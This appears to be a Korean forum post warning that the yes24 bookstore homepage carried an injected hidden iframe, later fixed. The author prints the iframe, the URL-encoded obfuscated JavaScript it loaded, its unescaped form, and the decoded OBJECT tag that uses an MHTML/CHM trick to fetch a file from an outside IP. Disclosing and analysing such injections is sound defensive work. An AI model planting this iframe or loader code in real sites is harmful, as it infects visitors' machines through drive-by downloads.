주의!! yes24 탑페이지 html 소스에 악성코드 박혀있습니다. (해결되었음)

친구가 말해줘서 방금 확인해봤더니 진짜 있습니다.

http://www.yes24.co.kr/ 페이지 소스보면 중간에 다음과 같이 들어있습니다.

<iframe height=0 width=0 src="http://218.3.208.183/qqq/index.htm"></iframe>

절대로 IE로 열어보지 마세요. 파이어폭스나 wget 등을 이용하시기 바랍니다.

http://218.3.208.183/qqq/index.htm 의 소스를 보면 다음과 같이 되어있습니다.

<script>
<!--
document.write(unescape("%3CSCRIPT%20LANGUAGE%3D%22JavaScript%22%3E%0D%0A%3C%21--%0D
%0Avar%20HtmlStrings%3D%5B%22%3DPCKFDU%21Xjeui%3E1%21Ifjhiu%3E1%21tuzmf%3E%23ejtqmbz
%3Bopof%3C%23%21uzqf%3E%23ufyu0y.tdsj%22%2C%22qumfu%23%21ebub%3E%23nl%3BANTJUTupsf
%3Bniunm%3Bd%3B%5D/niu%01iuuq%3B00329/4/319/294%22%2C%220rrr0ifmq/uyu%3B%3B0%2634%2
63F%2679%2685n%23%02%3E%3D0PCKFDU%02%3E%0E%0B%22%5D%3B%0D%0Afunction%20psw%2
8st%29%7B%0D%0A%20%20var%20varS%3B%0D%0A%20%20varS%3D%22%22%3B%0D%0A%20%20v
ar%20i%3B%0D%0A%20%20for%28var%20a%3D0%3Ba%3Cst.length%3Ba++%29%7B%0D%0A%20%20
%20%20i%20%3D%20st.charCodeAt%28a%29%3B%20%0D%0A%20%20%20%20if%20%28i%3D%3D1%
29%20%0D%0A%20%20%20%20%20%20varS%3DvarS+String.fromCharCode%28%27%22%27.charCode
At%28%29-1%29%3B%0D%0A%20%20%20%20else%20if%20%28i%3D%3D2%29%20%7B%0D%0A%20
%20%20%20%20%20a++%3B%0D%0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28st.ch
arCodeAt%28a%29%29%3B%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20else%0D%
0A%20%20%20%20%20%20varS+%3DString.fromCharCode%28i-1%29%3B%0D%0A%20%20%7D%0D%0A
%20%20return%20varS%3B%0D%0A%7D%3B%0D%0Avar%20num%3D3%3B%0D%0Afunction%20S%28%
29%7B%0D%0Afor%28i%3D0%3Bi%3Cnum%3Bi++%29%0D%0A%20%20document.write%28psw%28HtmlS
trings%5Bi%5D%29%29%3B%7D%0D%0AS%28%29%3B%0D%0A//%20--%3E%0D%0A%3C/SCRIPT%3E%0
D%0A%0D%0A"));
//-->
</script>

그래서 뭘 escape 해놨나 봤더니 다음과 같더군요.

<script>
<!--
document.write(unescape("<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=PCKFDU!Xjeui>1!Ifjhiu>1!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsj",
"qumfu#!ebub>#nl;ANTJUTupsf;niunm;d;]/niuiuuq;00329/4/319/294","
0rrr0ifmq/uyu;;0&34&3F&79&85n#>=0PCKFDU>"];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a); 
    if (i==1) 
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=3;
function S(){
for(i=0;i<num;i  )
  document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>

"));
//-->
</script>

심심해서 저 코드가 스트링을 어떻게 변환하나 봤습니다. 다음과 같이 나옵니다.

<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scri
ptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://218.3.208.183
/qqq/help.txt::/%23%2E%68%74m"></OBJECT>

저게 뭐하는 코드인지는 확실치 않지만, http://218.3.208.183/qqq/help.txt 라는 파일을 다운받아 뭔가 하는 것 같습니다.
다운받아서 파일헤더를 살펴보니 chm 파일이네요.

이 글을 쓰는 현재도 yes24 홈페이지에 저 코드가 박혀있습니다. 이 글 보시는 분들은 IE로 yes24 접속하지 않도록 다른 분들께
주의 부탁드립니다.